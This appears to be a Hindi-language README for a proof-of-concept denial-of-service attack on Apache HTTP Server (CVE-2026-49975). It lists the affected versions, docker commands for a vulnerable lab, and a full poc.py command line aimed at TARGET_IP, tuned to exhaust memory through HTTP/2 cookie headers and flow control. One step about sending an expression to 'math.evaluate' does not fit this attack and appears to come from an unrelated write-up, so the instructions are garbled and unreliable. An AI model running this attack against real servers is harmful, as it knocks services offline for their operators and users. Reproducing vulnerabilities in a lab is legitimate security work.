
HTTP/2 बम
★ CVE-2026-49975 HTTP/2 बम PoC ★
https://github.com/user-attachments/assets/89310771-f704-45d1-a6c3-d910de1dbc74
CVE-2026-49975 Apache HTTP Server में एक Denial of Service (DoS) भेद्यता है। यह भेद्यता HTTP/2 अनुरोध हैंडलिंग पथ में होती है, जहाँ कई
cookieहेडर फ़ील्ड्स कोLimitRequestFieldsके विरुद्ध ठीक से गिने बिना विलय किया जा सकता है। एक छोटा HPACK-एन्कोडेड HTTP/2 अनुरोध भेजकर, जो कईcookieहेडर फ़ील्ड्स में विस्तारित होता है, एक हमलावर सर्वर को Cookie हेडर विलय के दौरान बार-बार मेमोरी आवंटित करने के लिए मजबूर कर सकता है। हमलावर फिर HTTP/2 फ्लो कंट्रोल का उपयोग करके प्रतिक्रिया संचरण में देरी कर सकता है, प्रभावित स्ट्रीम्स को खुला रखकर आवंटित मेमोरी को जारी होने से रोक सकता है।
| श्रेणी | संस्करण |
|---|---|
| असुरक्षित | Apache HTTP Server 2.4.17 ≤ संस्करण ≤ 2.4.67 |
| पैच किया गया | Apache HTTP Server 2.4.68 या बाद का |
असुरक्षित Apache HTTP Server वातावरण बनाएँ और चलाएँ।
docker build -t cve-2026-49975 .
docker run -d --name cve-2026-49975 --memory 8g -p 10081:80 cve-2026-49975
असुरक्षित वातावरण शुरू करने के बाद, हमले को दोहराने के लिए नीचे दिए गए चरणों का पालन करें।
docker stats cve-2026-49975
उदाहरण आउटपुट:
CONTAINER ID NAME CPU % MEM USAGE / LIMIT MEM %
xxxxxxxxxxxx cve-2026-49975 0.5% 35.2MiB / 8.0GiB 1.7%
math.evaluate को निम्नलिखित एक्सप्रेशन भेजें (जैसे, एप्लिकेशन के कैलकुलेशन इनपुट के माध्यम से)।
python3 poc.py \
--host TARGET_IP \
--port 10081 \
--connections 10 \
--streams 100 \
--refs 4091 \
--initial-window 0 \
--hold 300 \
--drip-interval 2 \
--drip-bytes 1
जाँच करें कि जब हमले की स्ट्रीम्स खुली रखी जाती हैं, तो Apache कंटेनर की मेमोरी उपयोग बढ़ती है और उच्च बनी रहती है।